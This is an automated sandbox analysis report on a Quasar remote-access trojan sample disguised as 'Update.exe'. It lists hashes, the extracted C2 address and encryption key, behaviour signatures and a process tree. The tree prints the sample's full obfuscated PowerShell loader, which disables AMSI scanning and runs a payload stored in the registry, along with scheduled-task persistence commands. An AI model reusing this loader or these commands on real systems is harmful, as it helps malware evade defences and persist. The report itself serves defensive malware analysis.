Analysis

  • max time kernel
    44s
  • max time network
    44s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240412-en
  • resource tags

    arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    21-04-2024 17:18

Errors

Reason
Machine shutdown: "{\"level\":\"info\",\"time\":\"2024-04-21T17:19:24Z\",\"message\":\"Dirty snapshot: /var/lib/sandbox/hatchvm/win11-20240412-en/instance_7-dirty.qcow2\"}"

General

  • Target

    Update.exe

  • Size

    409KB

  • MD5

    93cd801b9e5e90edab480d3c1c135271

  • SHA1

    b0c7e918ade7a47916603ebd9eb1e3b4d78062c2

  • SHA256

    89996d761395b9e79589c4c7c93cc21ae2b5a00a9ba8c46abbf395954f3d0133

  • SHA512

    a5e207744fcb100fb24935ecda4c4214ac4cc7aca666b589fa1c451f1ad24c5a573cfe1b8150ac5510a866bb800251aa6ebf3fd685ed7a2e5fbc482791e143ed

  • SSDEEP

    6144:0rBUymyfpwzeiqv6Ef3RB17bdzjyue7zKINbuz2vcDJ8vtVQY:eBwz9/Ef3RB17FyuYKIQXDJ8vtCY

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

147.185.221.19:33587

Mutex

$Sxr-zpFqsQjJJh3miBvVnu

Attributes
  • encryption_key

    w1TSUMSbvOFQ9whpYTwH

  • install_name

    BiosUpdX64YDPS.exe

  • log_directory

    $sxr

  • reconnect_delay

    3000

  • startup_key

    $sxr-mtsha

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:620
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:376
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{1709a6b1-ddbb-429a-a316-3423ba95c575}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:940
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:676
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:972
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:752
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:420
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1096
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1108
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                  1⤵
                    PID:1136
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1164
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UzbtnZtgtWrf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PZyfYJrztuRTcF,[Parameter(Position=1)][Type]$UExkEpufCO)$rXCGEVNhvrT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'ed'+'D'+'e'+[Char](108)+''+[Char](101)+'ga'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'el'+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e'+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'','Cl'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](83)+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+'d,An'+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$rXCGEVNhvrT.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+'g,P'+[Char](117)+''+'b'+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$PZyfYJrztuRTcF).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'na'+[Char](103)+'e'+'d'+'');$rXCGEVNhvrT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+'P'+'u'+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+'d'+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+''+[Char](108)+'',$UExkEpufCO,$PZyfYJrztuRTcF).SetImplementationFlags('R'+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+''+'a'+''+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $rXCGEVNhvrT.CreateType();}$MQBbbMtzmmVHq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+'a'+''+'t'+''+'i'+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+'t'+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$wNGsPLiuaqcVlc=$MQBbbMtzmmVHq.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+[Char](116)+''+[Char](97)+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$agAytYsXKvPcdJeFIiC=UzbtnZtgtWrf @([String])([IntPtr]);$iuXKjZOoniVXvsPAhtjUag=UzbtnZtgtWrf @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$dMCZBOmtwLJ=$MQBbbMtzmmVHq.GetMethod(''+[Char](71)+''+'e'+''+'t'+'M'+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+'a'+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'r'+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$enVEhjXiQTPfVS=$wNGsPLiuaqcVlc.Invoke($Null,@([Object]$dMCZBOmtwLJ,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+''+'A'+'')));$FdWPaLyMDiovYHypu=$wNGsPLiuaqcVlc.Invoke($Null,@([Object]$dMCZBOmtwLJ,[Object]('V'+'i'+'rtua'+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$Dyevdjd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($enVEhjXiQTPfVS,$agAytYsXKvPcdJeFIiC).Invoke(''+'a'+''+[Char](109)+''+'s'+''+'i'+''+'.'+''+[Char](100)+''+'l'+'l');$DmcQoFbEdFBxrsTLL=$wNGsPLiuaqcVlc.Invoke($Null,@([Object]$Dyevdjd,[Object]('A'+[Char](109)+''+'s'+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+'B'+''+[Char](117)+'f'+'f'+''+[Char](101)+'r')));$HUJjqHSciz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FdWPaLyMDiovYHypu,$iuXKjZOoniVXvsPAhtjUag).Invoke($DmcQoFbEdFBxrsTLL,[uint32]8,4,[ref]$HUJjqHSciz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DmcQoFbEdFBxrsTLL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FdWPaLyMDiovYHypu,$iuXKjZOoniVXvsPAhtjUag).Invoke($DmcQoFbEdFBxrsTLL,[uint32]8,0x20,[ref]$HUJjqHSciz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+'AR'+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+'s'+'t'+[Char](97)+'ge'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1524
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                      1⤵
                        PID:1228
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1320
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1332
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                            1⤵
                              PID:1528
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1540
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:748
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1580
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1588
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k NetworkService -p
                                      1⤵
                                        PID:1616
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1700
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1760
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                            1⤵
                                              PID:1812
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1984
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1216
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1316
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:1924
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2064
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2188
                                                        • C:\Windows\sysmon.exe
                                                          C:\Windows\sysmon.exe
                                                          1⤵
                                                            PID:2604
                                                          • C:\Users\Admin\AppData\Local\Temp\Update.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Update.exe"
                                                            1⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:3636
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              "schtasks" /create /tn "$sxr-mtsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Update.exe" /rl HIGHEST /f
                                                              2⤵
                                                              • Creates scheduled task(s)
                                                              PID:3772
                                                            • C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe
                                                              "C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of SetWindowsHookEx
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:3384
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                "schtasks" /create /tn "$sxr-mtsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe" /rl HIGHEST /f
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:724
                                                            • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:2036
                                                            • C:\Windows\SysWOW64\SCHTASKS.exe
                                                              "SCHTASKS.exe" /create /tn "$77Update.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Update.exe'" /sc onlogon /rl HIGHEST
                                                              2⤵
                                                              • Creates scheduled task(s)
                                                              PID:5100
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                            1⤵
                                                              PID:4132
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                              1⤵
                                                                PID:3448
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                1⤵
                                                                  PID:2996

                                                                Network

                                                                MITRE ATT&CK Matrix ATT&CK v13

                                                                Execution

                                                                Scheduled Task/Job

                                                                1
                                                                T1053

                                                                Persistence

                                                                Scheduled Task/Job

                                                                1
                                                                T1053

                                                                Privilege Escalation

                                                                Scheduled Task/Job

                                                                1
                                                                T1053

                                                                Command and Control

                                                                Web Service

                                                                1
                                                                T1102

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                  Filesize

                                                                  162KB

                                                                  MD5

                                                                  152e3f07bbaf88fb8b097ba05a60df6e

                                                                  SHA1

                                                                  c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                  SHA256

                                                                  a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                  SHA512

                                                                  2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                • C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe
                                                                  Filesize

                                                                  409KB

                                                                  MD5

                                                                  93cd801b9e5e90edab480d3c1c135271

                                                                  SHA1

                                                                  b0c7e918ade7a47916603ebd9eb1e3b4d78062c2

                                                                  SHA256

                                                                  89996d761395b9e79589c4c7c93cc21ae2b5a00a9ba8c46abbf395954f3d0133

                                                                  SHA512

                                                                  a5e207744fcb100fb24935ecda4c4214ac4cc7aca666b589fa1c451f1ad24c5a573cfe1b8150ac5510a866bb800251aa6ebf3fd685ed7a2e5fbc482791e143ed

                                                                • C:\Windows\Temp\__PSScriptPolicyTest_hlnxnwnm.5y0.ps1
                                                                  Filesize

                                                                  60B

                                                                  MD5

                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                  SHA1

                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                  SHA256

                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                  SHA512

                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                • memory/376-291-0x00007FFBE38A3000-0x00007FFBE38A4000-memory.dmp
                                                                  Filesize

                                                                  4KB

                                                                • memory/376-198-0x00007FFBE38A3000-0x00007FFBE38A4000-memory.dmp
                                                                  Filesize

                                                                  4KB

                                                                • memory/376-184-0x00007FFBE38A6000-0x00007FFBE38A7000-memory.dmp
                                                                  Filesize

                                                                  4KB

                                                                • memory/376-91-0x000001BEA4CE0000-0x000001BEA4D0B000-memory.dmp
                                                                  Filesize

                                                                  172KB

                                                                • memory/420-107-0x0000029B35100000-0x0000029B3512B000-memory.dmp
                                                                  Filesize

                                                                  172KB

                                                                • memory/620-71-0x00007FFBE38A6000-0x00007FFBE38A7000-memory.dmp
                                                                  Filesize

                                                                  4KB

                                                                • memory/620-69-0x00007FFBE38A4000-0x00007FFBE38A5000-memory.dmp
                                                                  Filesize

                                                                  4KB

                                                                • memory/620-58-0x000001B9D04F0000-0x000001B9D051B000-memory.dmp
                                                                  Filesize

                                                                  172KB

                                                                • memory/620-56-0x000001B9D04C0000-0x000001B9D04E5000-memory.dmp
                                                                  Filesize

                                                                  148KB

                                                                • memory/620-59-0x000001B9D04F0000-0x000001B9D051B000-memory.dmp
                                                                  Filesize

                                                                  172KB

                                                                • memory/620-67-0x000001B9D04F0000-0x000001B9D051B000-memory.dmp
                                                                  Filesize

                                                                  172KB

                                                                • memory/676-92-0x00007FFBA3890000-0x00007FFBA38A0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/676-93-0x00007FFBE38A4000-0x00007FFBE38A5000-memory.dmp
                                                                  Filesize

                                                                  4KB

                                                                • memory/676-88-0x000001C5DBBA0000-0x000001C5DBBCB000-memory.dmp
                                                                  Filesize

                                                                  172KB

                                                                • memory/676-74-0x000001C5DBBA0000-0x000001C5DBBCB000-memory.dmp
                                                                  Filesize

                                                                  172KB

                                                                • memory/752-102-0x00000268A77C0000-0x00000268A77EB000-memory.dmp
                                                                  Filesize

                                                                  172KB

                                                                • memory/940-39-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                  Filesize

                                                                  32KB

                                                                • memory/940-51-0x00007FFBE1C30000-0x00007FFBE1CED000-memory.dmp
                                                                  Filesize

                                                                  756KB

                                                                • memory/940-109-0x00007FFBE3800000-0x00007FFBE3A09000-memory.dmp
                                                                  Filesize

                                                                  2.0MB

                                                                • memory/940-38-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                  Filesize

                                                                  32KB

                                                                • memory/940-42-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                  Filesize

                                                                  32KB

                                                                • memory/940-44-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                  Filesize

                                                                  32KB

                                                                • memory/940-40-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                  Filesize

                                                                  32KB

                                                                • memory/940-53-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                  Filesize

                                                                  32KB

                                                                • memory/940-49-0x00007FFBE3800000-0x00007FFBE3A09000-memory.dmp
                                                                  Filesize

                                                                  2.0MB

                                                                • memory/972-83-0x000001AB3DD60000-0x000001AB3DD8B000-memory.dmp
                                                                  Filesize

                                                                  172KB

                                                                • memory/1524-24-0x00000229AFAC0000-0x00000229AFAD0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/1524-45-0x00007FFBE1C30000-0x00007FFBE1CED000-memory.dmp
                                                                  Filesize

                                                                  756KB

                                                                • memory/1524-37-0x00007FFBE1C30000-0x00007FFBE1CED000-memory.dmp
                                                                  Filesize

                                                                  756KB

                                                                • memory/1524-35-0x00000229AFDD0000-0x00000229AFDFA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/1524-57-0x00007FFBE3800000-0x00007FFBE3A09000-memory.dmp
                                                                  Filesize

                                                                  2.0MB

                                                                • memory/1524-34-0x00000229AFAC0000-0x00000229AFAD0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/1524-33-0x00000229AFA10000-0x00000229AFA32000-memory.dmp
                                                                  Filesize

                                                                  136KB

                                                                • memory/1524-36-0x00007FFBE3800000-0x00007FFBE3A09000-memory.dmp
                                                                  Filesize

                                                                  2.0MB

                                                                • memory/1524-52-0x00007FFBC15E0000-0x00007FFBC20A2000-memory.dmp
                                                                  Filesize

                                                                  10.8MB

                                                                • memory/1524-23-0x00007FFBC15E0000-0x00007FFBC20A2000-memory.dmp
                                                                  Filesize

                                                                  10.8MB

                                                                • memory/3384-22-0x00000000062C0000-0x00000000062CA000-memory.dmp
                                                                  Filesize

                                                                  40KB

                                                                • memory/3384-73-0x0000000004CF0000-0x0000000004D00000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/3384-195-0x0000000074B90000-0x0000000075341000-memory.dmp
                                                                  Filesize

                                                                  7.7MB

                                                                • memory/3384-68-0x0000000074B90000-0x0000000075341000-memory.dmp
                                                                  Filesize

                                                                  7.7MB

                                                                • memory/3384-14-0x0000000004CF0000-0x0000000004D00000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/3384-13-0x0000000074B90000-0x0000000075341000-memory.dmp
                                                                  Filesize

                                                                  7.7MB

                                                                • memory/3636-7-0x0000000006B50000-0x0000000006B8C000-memory.dmp
                                                                  Filesize

                                                                  240KB

                                                                • memory/3636-6-0x0000000005E40000-0x0000000005E52000-memory.dmp
                                                                  Filesize

                                                                  72KB

                                                                • memory/3636-5-0x00000000059E0000-0x0000000005A46000-memory.dmp
                                                                  Filesize

                                                                  408KB

                                                                • memory/3636-4-0x0000000005AF0000-0x0000000005B00000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/3636-0-0x0000000000DB0000-0x0000000000E1C000-memory.dmp
                                                                  Filesize

                                                                  432KB

                                                                • memory/3636-3-0x0000000005940000-0x00000000059D2000-memory.dmp
                                                                  Filesize

                                                                  584KB

                                                                • memory/3636-20-0x0000000074B90000-0x0000000075341000-memory.dmp
                                                                  Filesize

                                                                  7.7MB

                                                                • memory/3636-2-0x0000000005EF0000-0x0000000006496000-memory.dmp
                                                                  Filesize

                                                                  5.6MB

                                                                • memory/3636-1-0x0000000074B90000-0x0000000075341000-memory.dmp
                                                                  Filesize

                                                                  7.7MB